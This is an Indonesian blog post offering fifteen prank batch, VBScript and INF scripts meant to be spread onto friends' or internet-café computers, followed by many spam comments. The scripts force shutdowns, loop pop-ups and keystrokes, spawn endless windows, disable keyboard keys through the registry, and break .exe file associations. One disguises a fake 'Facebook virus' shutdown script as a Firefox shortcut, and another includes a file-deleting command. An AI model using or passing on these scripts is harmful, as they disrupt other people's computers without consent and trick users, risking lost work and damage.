Home » » Script jail notepad

Script jail notepad

Written By Melon Gokil on Kamis, 15 November 2012 | 07.15


TRIK 1  - Membuat Forced Shoutdown
————————————————-
@echo off
msg * I don’t like you
shutdown -c “Error! You are too ******!” -s
————————————————-
simpan kode script yang berwarna Merah di Notepad dengan nama : xhack.BAT type file : All file
sebarkan File tersebut di Komputer teman Anda,
maka Komputer korban akan otomatis FORCED SHOUTDOWN
TRIK 2 – Membuat Tombol Caps Lock menyala terus-menerus
——————————————————————
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
——————————————————-
seperti cara yang pertama, hanya berbeda kode script simpan kode yang berwarna biru di Notepad dengan nama : xhack.VBS type File : All File
sebarkan File berikut di Komputer korban maka, Tombol CAPSLOCK akan menyala terus-menerus
(bila dimatikan akan menyala lagi)
TRIK 3 – Membuat Pesan Jail mucul terus
——————————————————
@ECHO off
:Begin
msg * muka kamu sangat jelek
msg * ngaca dulu gih,
msg * hayo lo,cpu lu gw acak acak
msg * udah install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN
——————————————————
simpan kode script yang berwarna hijau dengan nama xhack.BAT type file : All File
Cara ini sangat simple Jail, walaupun di close tab pesan ini masih muncul, kata katanya bisa diubah sesuai selera.
 
TRIK 4 – Jail dengan Membuka Tutup CD/DVD room
——————————————————
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop——————————————————-
simpan di Notepad kode berikut dengan nama : xhack.vbs type file : All File
maka DVD/CD roomnya akan membuka dan menutup otomatis,
TRIK 5 – Membuat script mucul terus menerus
——————————————————-
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
——————————————————-
simpan kode berikut di Notepad dengan nama : xhack.vbs type file : All File
membuat script bermunculan terus menerus
TRIK 6 – Membuat Tombol Backspace menjadi eror – menekan terus menerus
——————————————————–
MsgBox “kembali ke menu sebelumnya”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
———————————————————-
simpan kode script berikut di Notepad dengan nama : xhack.vbs type file : All File
maka Tombol Backspace akan eror dan menekan dengan sendirinya


TRIK 7 – Cara Membuat Pesan ‘ Komputer Anda Jelek Banget ‘ di Notepad/ Wordpad
———————————————————–
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “Komputer Anda Jelek Banget”
loop
———————————————————–
ganti kata Komputer Anda Jelek Banget dengan selera Anda, simpan di Notepad dengan nama : xhack.vbs
TRIK 8 – Cara Membuat Notepad Terbuka Otomatis – terus menerus
————————————————————
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
————————————————————
simpan di Notepad dengan nama : xhack.BAT
maka Notepad akan terbuka terus menerus
TRIK 9 – Membuat Notepad dengan Pesan Jail
————————————————————-

WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 10
WshShell.AppActivate “Notepad”
WScript.Sleep 50
WshShell.SendKeys “ka”
WScript.Sleep 50
WshShell.SendKeys “mu “
WScript.Sleep 50
WshShell.SendKeys “je”
WScript.Sleep 50
WshShell.SendKeys “le”
WScript.Sleep 50
WshShell.SendKeys “k “
WScript.Sleep 50
WshShell.SendKeys ” se”
WScript.Sleep 50
WshShell.SendKeys “ka”
WScript.Sleep 50
WshShell.SendKeys “li”
WScript.Sleep 50
WshShell.SendKeys ” y”
WScript.Sleep 50
WshShell.SendKeys “a”
WScript.Sleep 50
WshShell.SendKeys ” h”
WScript.Sleep 50
WshShell.SendKeys “!”
WScript.Sleep 50
WshShell.SendKeys “!! “
———————————————————–
simpan di Notepad dengan nama : xhack.vbs 
ganti kode yang berwarna merah sesuai dengan selera anda.


TRIK 10 – Cara Membuat Memilih jawaban seperti Quiz di Notepad
———————————————————–
@echo off
title quiz hari ini :)
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:xxx
if %input%==3 @ECHO off
msg * muka lo rusak
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%
system32notepad.exe
GOTO top ———————————————————–
simpan kode script berikut di Notepad dengan nama : xhack.BAT


TRIK 11 – Membuat Komputer Hang dengan Kode script Notepad
————————————————————-
start
start
start
start
start
start
start
start
start
start
start
start
———————————————————–
simpan di Notepad dengan nama : xhack.BAT
terus buat shortcut palsu terserah mau shortcut apa, aku saranin shortcutnya browser mozilla terus taro aja di desktop target
( efeknya akan membuka CDM yang banyak banget sampe layarnya keluar keluar )


TRIK 12 – Cara Mematikan Tombol Keyboard
————————————————————-
1. Salin baris-baris kode (script) berikut , paste pada Notepad dan simpan dengan nama JAIL.INF
Langsung kita mulai saja :
[Version]
Signature=”$Windows NT$”
[DefaultInstall]
AddReg =AIUEO
[AIUEO]
HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map”,0×1,00,00,00,00,00,00,00,00,06,00,00,00,00,00,1e,00,00,00,12,00,00,00,
17,00,00,00,18,00,00,00,16,00,00,00,00,00
—————————————
2. Untuk menjalankannya, klik kanan nama file JAIL.INF dan pilih menu> Install
3. Log Off komputernya agar trik ini berfungsi.
NB :
Script diatas dimaksudkan untuk mematikan tombol A I U E O pada keyboard.
Untuk menormalkannya, silahkan salin script berikut :
—————————————
[Version]
Signature=”$Windows NT$”
[DefaultInstall]
DelReg =normal
[normal]
HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map”
—————————————
—> Simpan dengan nama “NORMAL.INF
Klik kanan file ini, pilih >Install
Log Off komputernya.
sumber artikel hack : kidzoom
TRIK 13 – Software Buat Jahil – Nakal
——————————————————–

Software 1

Kalau yang ini nemu di Kaskus. Tapi dijamin seru banget.. Dan inilah fungsinya :
-freeze
-snow
-earthquake
-random colours
-mouse and lines
-puzzle
Lihat efeknya dibawah
  1. Puzzleimage
  2. Mouse And Linesimage
Masih banyak lagi deh.. Tapi jangan salah cara menghentikannya pun sulit loh.. Buka task manager gag bisa. Klik tombol start gag bisa.. So bagaimana, Cukup Tekan ESC doang kok.. hhee  Silahkan dicoba
Download : klik disini

Software 2

1Nah kalau yang ini namanya Key joke! Fungsinya bikin lampu disco nih.. Sama seperti script yang saya berikan dulu.  Tampilannya seperti yang disamping tuh.. Ini sih masih biasa gag kaya yang diatas tadi..
Ow iya tapi sebelumnya jangan kaget ye kalau ada pesan banyak seperti ini2Karena ini juga ulahnya ni software. Bisa di close kok..
Download :  Klik disini

Software 3

Wah kali ini parah banget nih. Bisa bikin stress juga. Sampai sekarang saya pun belum tau cara ngatasinnya. Nama softwarenya Stoerung, sepertinya bahasa jerman, pas install pun berbahasa jerman. Software ini meng-invert warna desktop kita berkali-kali secara berkala. Namun efeknya, menurut saya bisa merusak VGA card, dan ini juga bisa bikin komputer lemot.. Ini pun sama dengan software seblumnya. Dy mengeluarkan alert seperti software 2 namun lebih banyaka
Download : klik disini
Masih ada 46 software lagi yang bisa kalian download untuk ngerjain temen lw.. dan efeknya mantep2 juga loh! Lihat disini
http://www.rjlpranks.com/pranks/
sumber artikel :  kidzoom
TRIK 14 – Cara Merusak Komputer teman / Warnet
—————————————————————
buka cmd(comand prompt), kalo belum tahu nyari dimana , klik start-run-ketik CMD-Lalu ketikan script ini
ASSOC.exe=.hank
lalu enter!
!!!!
program kayak ms.word/game ngambek jalan ! , n jika sudah puas banget jailnya dan mau ngembaliin-nya , tinggal buka CMD lagi. lalu ketik
ASSOC.exe=EXEFILE
—————————————————————
TRIK 15 -  Cara Paling Jahil Jahat 
—————————————————————-
1. BUka program notepad atau biar cepet menu RUN ketik notepad lalu enter
2. Copy kode ini dan pastekan di notepad kamu
@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c ” SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ………..”
3. Habis itu simpen file notepad ini dengan format *.bat = terserah mau diberi
nama apa, misal : pacebuk.bat dan SAVE di Dekstop (Recommended)
4. Sekarang klik kanan desktopmu dan pilih New => Shortcut
5. Setelah ini akan muncul sebuah tampilan dan klik browse lalu cari lokasi file
.bat yang kamu simpen tadi, misal tadi kamu save pada dekstop
6. Klik Next dan Rename dengan Mozilla Firefox (Untuk nama ini terserah kamu
dan bebas bisa ganti dengan Opera Mini atau Google Chrome, ini hanya
sebagai tipuan aja)
7.Bila semua langkah sudah oke, sekarang yang perlu kamu lakuin adalah
mengubah icon .bat tadi dalam bentuk Mozilla Firefox (karena kita sering pakai
Mozilla jadi pembahasannya pakai browser ini) .. Terus caranya gimana ?
Gampang.. tinggal kamu klik kanan file .bat tadi dan pilih change icon
Gak nemu icon mozilla ? Coba deh low cari di Program Files => Mozilla Firefox
Nah sekarang virus facebookmu telah jadi dengan sempurna, kalau kamu ingin
iseng nyoba tinggal di klik aja deh dan lihat perubahan yang akan terjadi ..
Harusnya pasti sedikit kaget dan coba low bayangin kalau trik ini kamu
praktekan di kompi temen kamu atau mungkin kompi kampus atau warnet..
what will happen ?  abis pastinya ..
Klik Bintang Di Bawah Ini :

Ditulis Oleh : Melon Gokil | Everything | About Facts | Mystery | Secret | News | Software

Artikel Script jail notepad ini diposting oleh Melon Gokil pada tanggal Kamis, 15 November 2012. Terimakasih telah mengunjungi blog saya. Semoga Bermanfaat. Dan Jangan Lupa Komentar dan Like Fans Page Kami.

:: Get this widget ! ::

20 komentar:

Spoiler Untuk lihat komentar yang masuk:
Anonim mengatakan...

Although, in this current life situation, stress is rather common, you should control the stress level.
Der primäre Punkt, halten den Sport übertragen in einem langsameren Tempo kann die Art der Wette zu platzieren erwerben.
Adequate Sleep - An alternate way to lose weight is to always have adequate
sleep.

Also visit my page: Formulacompany.Com
my page > Read More

Anonim mengatakan...

Be іntellectual еnough to sеe thаt уοur aԁ dοes not
go on air on a unseemlу shoω ; a Сhristiаn boοk going on air on a shоw that iѕ аbout handling sexual іѕsues
would bе гіdiculous. Yet
another ωay to сonstгuсt a deviсe to harness energу from radio
waνeѕ іs using an antenna, сonnected tο a
seгies of dіodes and a cарaсitor banκ that is eaгthed.
In much the same ωay, two-way radio rentаl оffers busineѕsеs and inԁividuаls substantial ѕavingѕ in money,
tіme аnd resouгcеs that equipment oωneгship never will.


Τake a look аt my blog - davincibook.com

Anonim mengatakan...

Hi, I think your blog might be having browser compatibility issues.
When I look at your blog site in Firefox, it looks fine but
when opening in Internet Explorer, it has
some overlapping. I just wanted to give you a quick heads up!
Other then that, amazing blog!

Also visit my blog - myvideo downloader

Anonim mengatakan...

These five free basketball game apps for the i - Phone will surely help
you get your game on. One way to test yourself is to deal yourself hand after
hand in front of a mirror and watch yourself as you react to the cards.
The full version has no ads and offers goal alerts for the leagues and teams of your choice.


My web page :: radiosender

Anonim mengatakan...

Nice blog here! Also your site loads up very fast! What web host are you
using? Can I get your affiliate link to your host?

I wish my site loaded up as fast as yours lol

Here is my weblog: internetradio

Anonim mengatakan...

These are also aνаilable with PTО Delay featuгe
which аutomatiсally open tank internal valvе for 5
seсonds prior tο еngаging
РΤО allowing рump and product lineѕ to сharge prevіeωing intеrval valve slug.
(Chеck out the article: Whаt's Really Out There in the Night Sky to see how some celestial objects appear at different EM frequencies. It is a more reliable choice when compared to traditional concrete or wooden barriers for several reasons.

Here is my web page: http://canon-mcmillan.patch.com/events/a-few-helpful-tips-for-internet-marketing

Anonim mengatakan...

always i uѕed tο read smaller content that аlsο cleаr their motіve, anԁ that is
alsο hapρening with thiѕ artісle ωhiсh Ι am reading at this place.


Here іs mу web page ... Chillout

Anonim mengatakan...

In short, they become obsessed by the grass is always greener syndrome where everyone else's relationship and their own past lovers are elevated to the status of perfection. Stored energy printers. One situation had me pose as bait to draw the enemies out so my ally could dispatch them. Fun the first time, but just not enjoyable after numerous journeys. I'm hoping that all of
you smarter ' more learned authors out there have a way to describe the intensity of this desire that you must have to journey in your own recovery. This miniature machine generates a monthly power of 40 k - Wh and is 36 inches tall. Today, the scenario is entirely different. In an effort to counter the lack of support from Microsoft, an SVG plug-in for Internet Explorer was developed and supported by Adobe. I was excited to see what they would come up with, since I already have two children. Why the lack of soul-wrenching anxiety.

My web site :: PenneyH41: games for girls free online to play now cooking

Anonim mengatakan...

Thanks , I have recently been searching for info approximately this subject for ages and yours is the best I've found out till now. However, what about the bottom line? Are you certain concerning the supply?

Have a look at my web site :: just click the up coming page
Also see my site: omerta city of gangsters game key

Anonim mengatakan...

"Is there really no way to transfer my VC and Wii - Ware games from my Wii to another. You will eventually run into the Download Location menu with two options: Wii System Menu and SD Card. A Twitter app for Zune has been created and is now available for download through Microsoft's Marketplace.

Also visit my web page :: internetradio

Anonim mengatakan...

There are many different kinds of tools and techniques required to deliver
an exceptional SEO India results. ''. The race
is becoming even more challenging with the passing of each day.

Naturally, they will flock to your competitor who does.
SEO must be implemented by following a step by step process.
The major preference is for offshore SEO companies as they offer SEO at the most competitive prices.
Some SEO firms focus on content spinning and submitting articles.

There are many tools online to help you research
relevant keywords, such as the Google Adwords
Keyword Tool. Its professionals would do hard work to achieve the high
traffic objective and they might taste success in their attempt but they would
desist from boasting anything about their success.
Also make sure that the articles are of high quality as it
is the key to get better rankings on search engines and
more profits. They want to know things about how to create effective copy,
general marketing tips and maybe even stuff about social media.
If the comments are created for solely promotional purposes,
they will probably get deleted. Now even that is quickly defining point of Search Engine Optimization (SEO) can lead to intense discussions about the meaning and purpose
of SEO. Here you will need an SEO agency such as Webfirm to try and
run damage limitation. Once you find the right and affordable SEO Company, it
is essential to talk about your business objectives, target customers and future
goals with the professionals to help them develop their strategies accordingly.
As of now, Thomas Lenarz has helped many people get the information on reputed SEO companies.
4) Managing your online business. SEO is becoming the most rewarding career nowadays.
And make the work flow smoothly, using good grammar at all times.

This is more of an indirect way of getting direct traffic to your e - Bay store.


Here is my web site - maumauexterminador.blogspot.com

Anonim mengatakan...

For some people, renting those games was another option,
which yet again burns a hole in their pocket.
A look into some of the best Star Wars apps to be found
on i - Tunes, including games, fun soundboards, books, and more.
In our next article, we'll be tackling using SNES4i - Phone to do exactly that - play those old favorites, like Chono Trigger, Super Ghouls and Ghosts, or even Super Mario Bros 3.

Feel free to visit my blog ... gratis spiele spielen

Anonim mengatakan...

Υou can also buy bundle deals, which
most гadio stations offeг, to decreasе the overall aԁ cost.
While the effеcts of antennа polarization may bе interpreted
аs a rеduction in the quality of some rаdio
links, some гadіo desіgners often make use
of this proρerty to tune an antenna to their needs by restrіcting transmission or reception to signals on a limited number of vесtors.
Proffering multifarious benefіts to thе аdѵertiѕеrѕ, it іs a
quintessential resort for comрanies big or small.



Feel free to visit my weblog ... videos von youtube downloaden

Anonim mengatakan...

The Federal Emergency Management Agency (FEMA) has made available to communities literature which provides guidance and technical information educating communities on how to become disaster resistant
in the face of natural disasters. Continually letting a battery drain will make it die
much faster then it normally would. While the older 17 inch
Mac - Book Pros lack the benefits of the unibody design, they do have
the added feature of user-replaceable batteries.

my site ... youtube downloader online
my web page: radiosender

Anonim mengatakan...

The Federal Emergency Management Agency (FEMA) has made available to communities literature which provides
guidance and technical information educating communities on how to become disaster resistant in the face of natural disasters.
An alternate electrical power source reduces the probability that the access
technique will turn out to be inoperable
via strength reduction and aid conserve battery lifestyle.
Aside from these types of power packs, you can even choose the 8-cell and also 12-cell
electric battery.

Feel free to visit my webpage - visit the up coming article

Anonim mengatakan...

However, the number of apps is steadily rising, and if Nokia continues to put
out quality phones like the Lumia 900, we may see developers take more notice and the number of apps will rise accordingly.
I even find myself backing away from recommending other resources which, in the past, I would have shared willingly.
Wherever you click you are instantly overwhelmed with special offers:
book this, buy that, fly with us, hop on this, reserve that.
you ask with softness coming back into your voice as you sit on the sand
beside me. Their history timeline details how the greenhouse covered 4,000 square feet,
and in 1976, a 6,000 square foot greenhouse was added.
Those pain killers and medications hide the problem without dealing with the true cause.
They will check into a purpose built sports complex 8
miles from the venue of their first match in Rustenburg.
It works across Windows XP, Windows Vista,
and Windows 7, and Maxi - Vista surprised me by how well
it worked with it. *Composite fillings. For people from non technical background these things
look like rocket science.

my site: Dead space 3 Key

Anonim mengatakan...

However, the number of apps is steadily rising, and
if Nokia continues to put out quality phones like the Lumia 900, we may see developers take more notice and the number of apps will rise accordingly.
I even find myself backing away from recommending other resources which, in the past,
I would have shared willingly. Wherever you click
you are instantly overwhelmed with special offers: book this, buy that, fly
with us, hop on this, reserve that. you ask with softness coming back into your voice as you sit on the sand beside me.
Their history timeline details how the greenhouse covered
4,000 square feet, and in 1976, a 6,000 square foot greenhouse was added.

Those pain killers and medications hide the problem without dealing with the true cause.

They will check into a purpose built sports complex
8 miles from the venue of their first match in Rustenburg.

It works across Windows XP, Windows Vista, and Windows 7,
and Maxi - Vista surprised me by how well it worked with
it. *Composite fillings. For people from non technical background these
things look like rocket science.

Also visit my site: Dead space 3 Key
my website - http://alamos.math.arizona.edu/math577wiki/index.php?title=User:DLHMargar

Anonim mengatakan...

Around 150 games in total, but that's relatively small compared to our users. While having a passion for playing games is important, getting a rewarding career in game design will require students to be a cut above the competition. People are now looking to be able to connect to things like their vehicles through their smart phones, and now Buick has announced the release of their new e - Assist Fuel Effeciency smartphone games.

Also visit my web site; http://spielespielen24.de//ad.adnet.de/adi.php?s=15879;wxh=160x600

Anonim mengatakan...

In addition to this, now you can listen to the radios online, which is already getting to be pretty popular.
One of the best internet radio apps I've found so far on the Windows Phone 7 Marketplace is for Last. " Many of these people knew that drugs were wrong, but elected the easy route of following the popular opinion.

Review my page - http://www.leondus.com/

Anonim mengatakan...

Youг post has estаbliѕhed helpful to us.
It’s very uѕеful and уou're simply certainly quite educated in this field. You get opened our eyes for you to different opinion of this particular subject matter together with interesting and reliable content material.
My blog post phentermine


Posting Komentar

comment it